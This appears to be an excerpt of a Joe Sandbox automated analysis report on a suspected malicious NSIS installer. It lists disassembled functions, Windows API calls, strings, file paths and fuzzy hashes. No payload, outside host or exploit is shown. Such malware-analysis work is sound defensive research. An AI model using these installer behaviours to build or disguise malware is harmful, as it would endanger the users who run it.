56 403772-403778 45->56 57 40367c-40368c call 405724 ExitProcess 45->57 48 403657-40365e call 40391f 46->48 49 4035c8-4035d3 call 4059c0 46->49 59 403663 48->59 63 403621-40362b 49->63 64 4035d5-40360a 49->64 61 403815-40381d 56->61 62 40377e-40379b call 4062b2 * 3 56->62 59->45 68 403823-403827 ExitProcess 61->68 69 40381f 61->69 92 4037e5-4037f3 call 4062b2 62->92 93 40379d-40379f 62->93 66 403692-4036ac lstrcatW lstrcmpiW 63->66 67 40362d-40363b call 405a9b 63->67 71 40360c-403610 64->71 66->45 73 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 66->73 67->45 83 40363d-403653 call 405f48 * 2 67->83 69->68 75 403612-403617 71->75 76 403619-40361d 71->76 79 4036d1-4036fa call 405f48 73->79 80 4036c6-4036cc call 405f48 73->80 75->76 77 40361f 75->77 76->71 76->77 77->63 91 4036ff-40371b call 405f6a DeleteFileW 79->91 80->79 83->48 102 40375c-403764 91->102 103 40371d-40372d CopyFileW 91->103 105 403801-40380c ExitWindowsEx 92->105 106 4037f5-4037ff 92->106 93->92 96 4037a1-4037a3 93->96 96->92 100 4037a5-4037b7 GetCurrentProcess 96->100 100->92 115 4037b9-4037db 100->115 102->91 104 403766-40376d call 405de2 102->104 103->102 107 40372f-40374f call 405de2 call 405f6a call 4056c3 103->107 104->45 105->61 109 40380e-403810 call 40140b 105->109 106->105 106->109 107->102 122 403751-403758 CloseHandle 107->122 109->61 115->92 122->102
                                                          APIs
                                                          • #17.COMCTL32 ref: 00403379
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",00000000), ref: 004033DB
                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",00000020), ref: 00403403
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
                                                          • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",00000000,?), ref: 00403698
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",00000000,?), ref: 004036A4
                                                          • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,0041FEA8,00000001), ref: 00403725
                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                          • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                          • String ID: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\Desktop$C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                          • API String ID: 4107622049-468414520
                                                          • Opcode ID: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                          • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                          • Opcode Fuzzy Hash: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                          • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
                                                          Function 00405331 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282windowclipboardmemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 123 405331-40534c 124 405352-40541b GetDlgItem * 3 call 4041cf call 404a8f GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 4054dd-4054e4 123->125 146 405439-40543c 124->146 147 40541d-405437 SendMessageW * 2 124->147 127 4054e6-405508 GetDlgItem CreateThread CloseHandle 125->127 128 40550e-40551b 125->128 127->128 130 405539-405543 128->130 131 40551d-405523 128->131 135 405545-40554b 130->135 136 405599-40559d 130->136 133 405525-405534 ShowWindow * 2 call 4041cf 131->133 134 40555e-405567 call 404201 131->134 133->130 143 40556c-405570 134->143 140 405573-405583 ShowWindow 135->140 141 40554d-405559 call 404173 135->141 136->134 138 40559f-4055a5 136->138 138->134 148 4055a7-4055ba SendMessageW 138->148 144 405593-405594 call 404173 140->144 145 405585-40558e call 4051f2 140->145 141->134 144->136 145->144 152 40544c-405463 call 40419a 146->152 153 40543e-40544a SendMessageW 146->153 147->146 154 4055c0-4055eb CreatePopupMenu call 405f6a AppendMenuW 148->154 155 4056bc-4056be 148->155 162 405465-405479 ShowWindow 152->162 163 405499-4054ba GetDlgItem SendMessageW 152->163 153->152 160 405600-405615 TrackPopupMenu 154->160 161 4055ed-4055fd GetWindowRect 154->161 155->143 160->155 165 40561b-405632 160->165 161->160 166 405488 162->166 167 40547b-405486 ShowWindow 162->167 163->155 164 4054c0-4054d8 SendMessageW * 2 163->164 164->155 169 405637-405652 SendMessageW 165->169 168 40548e-405494 call 4041cf 166->168 167->168 168->163 169->169 170 405654-405677 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 169->170 172 405679-4056a0 SendMessageW 170->172 172->172 173 4056a2-4056b6 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->155
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                          • GetClientRect.USER32(?,?), ref: 004053DC
                                                          • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405480
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                            • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                          • CloseHandle.KERNELBASE(00000000), ref: 00405508
                                                          • ShowWindow.USER32(00000000), ref: 0040552C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405531
                                                          • ShowWindow.USER32(00000008), ref: 0040557B
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                          • CreatePopupMenu.USER32 ref: 004055C0
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                          • GetWindowRect.USER32(?,?), ref: 004055F4
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                          • OpenClipboard.USER32(00000000), ref: 00405655
                                                          • EmptyClipboard.USER32 ref: 0040565B
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                          • CloseClipboard.USER32 ref: 004056B6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {$&B
                                                          • API String ID: 590372296-2518801558
                                                          • Opcode ID: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                          • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                          • Opcode Fuzzy Hash: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                          • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69
                                                          Function 00405F6A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 419 405f6a-405f75 420 405f77-405f86 419->420 421 405f88-405f9e 419->421 420->421 422 405fa4-405fb1 421->422 423 4061b6-4061bc 421->423 422->423 424 405fb7-405fbe 422->424 425 4061c2-4061cd 423->425 426 405fc3-405fd0 423->426 424->423 428 4061d8-4061d9 425->428 429 4061cf-4061d3 call 405f48 425->429 426->425 427 405fd6-405fe2 426->427 430 4061a3 427->430 431 405fe8-406024 427->431 429->428 433 4061b1-4061b4 430->433 434 4061a5-4061af 430->434 435 406144-406148 431->435 436 40602a-406035 GetVersion 431->436 433->423 434->423 439 40614a-40614e 435->439 440 40617d-406181 435->440 437 406037-40603b 436->437 438 40604f 436->438 437->438 443 40603d-406041 437->443 446 406056-40605d 438->446 444 406150-40615c call 405e8f 439->444 445 40615e-40616b call 405f48 439->445 441 406190-4061a1 lstrlenW 440->441 442 406183-40618b call 405f6a 440->442 441->423 442->441 443->438 448 406043-406047 443->448 457 406170-406179 444->457 445->457 450 406062-406064 446->450 451 40605f-406061 446->451 448->438 453 406049-40604d 448->453 455 4060a0-4060a3 450->455 456 406066-406083 call 405e15 450->456 451->450 453->446 458 4060b3-4060b6 455->458 459 4060a5-4060b1 GetSystemDirectoryW 455->459 465 406088-40608c 456->465 457->441 461 40617b 457->461 463 406121-406123 458->463 464 4060b8-4060c6 GetWindowsDirectoryW 458->464 462 406125-406129 459->462 466 40613c-406142 call 4061dc 461->466 462->466 469 40612b-40612f 462->469 463->462 467 4060c8-4060d2 463->467 464->463 468 406092-40609b call 405f6a 465->468 465->469 466->441 474 4060d4-4060d7 467->474 475 4060ec-406102 SHGetSpecialFolderLocation 467->475 468->462 469->466 472 406131-406137 lstrcatW 469->472 472->466 474->475 477 4060d9-4060e0 474->477 478 406104-40611b SHGetPathFromIDListW CoTaskMemFree 475->478 479 40611d 475->479 480 4060e8-4060ea 477->480 478->462 478->479 479->463 480->462 480->475
                                                          APIs
                                                          • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 0040602D
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060AB
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004060BE
                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
                                                          • CoTaskMemFree.OLE32(?), ref: 00406113
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 00406191
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-1875107529
                                                          • Opcode ID: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                          • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                          • Opcode Fuzzy Hash: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                          • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                          Function 004057D0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 481 4057d0-4057f6 call 405a9b 484 4057f8-40580a DeleteFileW 481->484 485 40580f-405816 481->485 488 40598c-405990 484->488 486 405818-40581a 485->486 487 405829-405839 call 405f48 485->487 489 405820-405823 486->489 490 40593a-40593f 486->490 494 405848-405849 call 4059df 487->494 495 40583b-405846 lstrcatW 487->495 489->487 489->490 490->488 493 405941-405944 490->493 496 405946-40594c 493->496 497 40594e-405956 call 40628b 493->497 498 40584e-405852 494->498 495->498 496->488 497->488 505 405958-40596c call 405993 call 405788 497->505 501 405854-40585c 498->501 502 40585e-405864 lstrcatW 498->502 501->502 504 405869-405885 lstrlenW FindFirstFileW 501->504 502->504 506 40588b-405893 504->506 507 40592f-405933 504->507 521 405984-405987 call 4051f2 505->521 522 40596e-405971 505->522 510 4058b3-4058c7 call 405f48 506->510 511 405895-40589d 506->511 507->490 509 405935 507->509 509->490 523 4058c9-4058d1 510->523 524 4058de-4058e9 call 405788 510->524 515 405912-405922 FindNextFileW 511->515 516 40589f-4058a7 511->516 515->506 519 405928-405929 FindClose 515->519 516->510 520 4058a9-4058b1 516->520 519->507 520->510 520->515 521->488 522->496 525 405973-405982 call 4051f2 call 405de2 522->525 523->515 526 4058d3-4058dc call 4057d0 523->526 534 40590a-40590d call 4051f2 524->534 535 4058eb-4058ee 524->535 525->488 526->515 534->515 538 4058f0-405900 call 4051f2 call 405de2 535->538 539 405902-405908 535->539 538->515 539->515
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 004057F9
                                                          • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 00405841
                                                          • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 00405864
                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 0040586A
                                                          • FindFirstFileW.KERNELBASE(004246F0,?,?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 0040587A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                          • FindClose.KERNEL32(00000000), ref: 00405929
                                                          Strings
                                                          • \*.*, xrefs: 0040583B
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057DE
                                                          • "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe", xrefs: 004057D9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-748700029
                                                          • Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                          • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                          • Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                          • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                          Function 0040659D Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                          • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                          Function 0040628B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,?,?,76232EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00406296
                                                          • FindClose.KERNEL32(00000000), ref: 004062A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: 8WB
                                                          • API String ID: 2295610775-3088156181
                                                          • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                          • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                          Function 004062B2 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                          • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
